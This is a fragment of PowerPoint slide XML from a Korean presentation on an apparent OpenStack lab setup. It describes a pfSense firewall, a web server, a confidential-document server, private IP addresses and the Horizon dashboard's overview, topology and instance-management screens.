                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>172.16.0.1(gw)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4162349" y="2509114"/>
            <a:ext cx="19202" cy="362102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="64748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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="4369003"/>
            <a:ext cx="6038698" cy="1904695"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1920"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="22D3EE"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="381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20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2258111" y="4924044"/>
            <a:ext cx="952805" cy="952805"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5758"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="94A3B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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2182216" y="4847234"/>
            <a:ext cx="1104595" cy="1104595"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5709"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="34D3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600096" y="5169103"/>
            <a:ext cx="304495" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2380742" y="5554471"/>
            <a:ext cx="743865" cy="1674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ko-KR" altLang="en-US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사내 커뮤니티</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty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>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5067300" y="4911699"/>
            <a:ext cx="952805" cy="952805"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5758"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="94A3B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Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4991405" y="4835804"/>
            <a:ext cx="1104595" cy="1104595"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5709"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="34D3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Text 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183124" y="5536692"/>
            <a:ext cx="721157" cy="1627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ko-KR" altLang="en-US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기밀 문서</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="9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서버</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229599" y="1544700"/>
            <a:ext cx="3581705" cy="1181405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8" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="1544700"/>
            <a:ext cx="38405" cy="118140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9" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8419795" y="1696491"/>
            <a:ext cx="267005" cy="267005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0" name="Image 5" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="-840" r="-840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8477402" y="1763242"/>
            <a:ext cx="152705" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8781898" y="1710207"/>
            <a:ext cx="197784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pfSense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8419794" y="2021103"/>
            <a:ext cx="3335731" cy="7050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Ram : 1gb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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용량</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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0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80gb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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VCPUs: 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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기능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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0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Software-defined Firewall &amp; Router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8235543" y="3232870"/>
            <a:ext cx="3581705" cy="1402766"/>
            <a:chOff x="8235543" y="2718511"/>
            <a:chExt cx="3581705" cy="1191159"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Shape 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8235543" y="2718511"/>
              <a:ext cx="3581705" cy="1175505"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="7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Shape 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8235543" y="2728265"/>
              <a:ext cx="38405" cy="1181405"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="34D399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Shape 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8419795" y="2787701"/>
              <a:ext cx="267005" cy="267005"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 73385"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="34D399">
                <a:alpha val="2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52" name="Image 7" descr="preencoded.png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8486546" y="2883027"/>
              <a:ext cx="133502" cy="133502"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Text 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8781898" y="2829992"/>
              <a:ext cx="2501798" cy="247802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1200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="E2E8F0"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>Web-server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Text 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8419794" y="3139973"/>
              <a:ext cx="3335731" cy="75994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10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OS: Mint</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l">
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="10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Ram: 6GB</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l">
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="10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용량</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="10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:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="10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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="10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30GB</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l">
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="10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VCPUs: 2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l">
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="10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기능</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="10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:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="10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 사내 커뮤니티 사이트</a:t>
              </a:r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91917" y="3075836"/>
            <a:ext cx="2402923" cy="706328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814523" y="2871216"/>
            <a:ext cx="2714854" cy="2286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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="F87171"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>172.16.0.200</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2874873" y="3899916"/>
            <a:ext cx="2714854" cy="2286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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="F87171"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>10.10.0.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68" name="Image 3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391455" y="5169103"/>
            <a:ext cx="304495" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377086" y="4502506"/>
            <a:ext cx="2714854" cy="2286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200" b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10.10.0.102</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4171950" y="4497019"/>
            <a:ext cx="2714854" cy="2286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ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b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10.10.0.100</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72" name="화살표 71"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="67" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2814523" y="4128517"/>
            <a:ext cx="1417777" cy="2404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화살표 72"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="67" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4232300" y="4128516"/>
            <a:ext cx="1463650" cy="2446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/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8241944" y="5131461"/>
            <a:ext cx="3581705" cy="1336090"/>
            <a:chOff x="8226018" y="4052011"/>
            <a:chExt cx="3581705" cy="1191159"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="Shape 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8226018" y="4052011"/>
              <a:ext cx="3581705" cy="1181405"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="70000"/>
              </a:srgbClr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5" name="Shape 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8226018" y="4061765"/>
              <a:ext cx="38405" cy="1181405"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="34D399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6" name="Shape 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8410270" y="4121201"/>
              <a:ext cx="267005" cy="267005"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 73385"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="34D399">
                <a:alpha val="20000"/>
              </a:srgbClr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77" name="Image 7" descr="preencoded.png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8477021" y="4216527"/>
              <a:ext cx="133502" cy="133502"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Text 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8772373" y="4163492"/>
              <a:ext cx="2501798" cy="247802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200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="E2E8F0"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>기밀 문서 서버</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Text 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8410269" y="4473473"/>
              <a:ext cx="3335731" cy="75994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1000" dirty="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OS: Alpine Linux</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l">
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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Ram: 1GB</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l">
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="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용량</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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5GB</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l">
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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VCPUs: 1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l">
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="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기능</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="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 웹 기밀 문서 서버 및 웹 공유 기능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중앙 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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집중형</a:t>
            </a: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 대시보드</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="390449"/>
            <a:ext cx="3720795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 kern="0" spc="-75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Openstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="0" spc="-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 Horizon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="30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3949" y="1694111"/>
            <a:ext cx="5926232" cy="427534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66656" y="1694111"/>
            <a:ext cx="5685900" cy="4275346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2333625" y="4790618"/>
            <a:ext cx="3581705" cy="1181405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B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0" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2333625" y="4790618"/>
            <a:ext cx="38405" cy="1181405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE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Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523820" y="4943323"/>
            <a:ext cx="267005" cy="267005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2" name="Image 3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90571" y="5010074"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885923" y="4956124"/>
            <a:ext cx="2273198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openstack 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개요</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2485720" y="5267020"/>
            <a:ext cx="333573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오픈스택의 전체적인 개요와 사용량 등을 한 눈에 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8267700" y="4781093"/>
            <a:ext cx="3384856" cy="1190930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B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6" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8267700" y="4781093"/>
            <a:ext cx="38405" cy="1190930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE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7" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8457895" y="4933798"/>
            <a:ext cx="267005" cy="267005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8" name="Image 3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524646" y="5000549"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8819998" y="4946599"/>
            <a:ext cx="2273198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네트워크 토폴로지</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8457895" y="5257495"/>
            <a:ext cx="333573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오픈 스택 네트워크를 한 눈에 파악 가능</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437921" y="1422502"/>
            <a:ext cx="2943454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https://172.16.0.131/dashboard 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접속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73676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중앙 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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집중형</a:t>
            </a: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 대시보드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l="-837" r="-837"/>
          <a:stretch/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381304" y="390449"/>
            <a:ext cx="3720795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 kern="0" spc="-75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Openstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="0" spc="-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 Horizon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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Infrastructure Overview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381305" y="1547165"/>
            <a:ext cx="7563002" cy="4307739"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 42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22D3EE">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="1016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371246" y="153710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371246" y="15371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7763256" y="153710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7934249" y="15371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371246" y="5852413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371246" y="56805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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7763256" y="5852413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7934249" y="56805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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229599" y="1542592"/>
            <a:ext cx="3581705" cy="1781633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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229599" y="1542592"/>
            <a:ext cx="38405" cy="1781633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8401050" y="1739072"/>
            <a:ext cx="285750" cy="296103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477174" y="1803653"/>
            <a:ext cx="133502" cy="171772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8781897" y="1755543"/>
            <a:ext cx="2273198" cy="31883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인스턴스 관리 화면</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8419794" y="2155561"/>
            <a:ext cx="3335731" cy="71179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 dirty="0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300" b="1" dirty="0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 인스턴스 삭제 가능</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="13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3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 실시간 상태 모니터링</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="13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3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 스냅샷 생성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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en-US" altLang="ko-KR" sz="13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3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 인프라 통합 제어</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans KR"/>
              <a:ea typeface="Noto Sans KR"/>
              <a:cs typeface="Noto Sans KR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29" y="1571073"/>
            <a:ext cx="7516176" cy="42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01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" y="20116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중앙 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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집중형</a:t>
            </a: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 대시보드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l="-837" r="-837"/>
          <a:stretch/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381304" y="390449"/>
            <a:ext cx="3720795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 kern="0" spc="-75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Openstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="0" spc="-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 Horizon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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Infrastructure Overview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381305" y="1547165"/>
            <a:ext cx="7563002" cy="4597855"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 42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22D3EE">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="1016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371246" y="153710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371246" y="15371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7763256" y="153710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7934249" y="15371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371246" y="6126732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371246" y="5954825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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
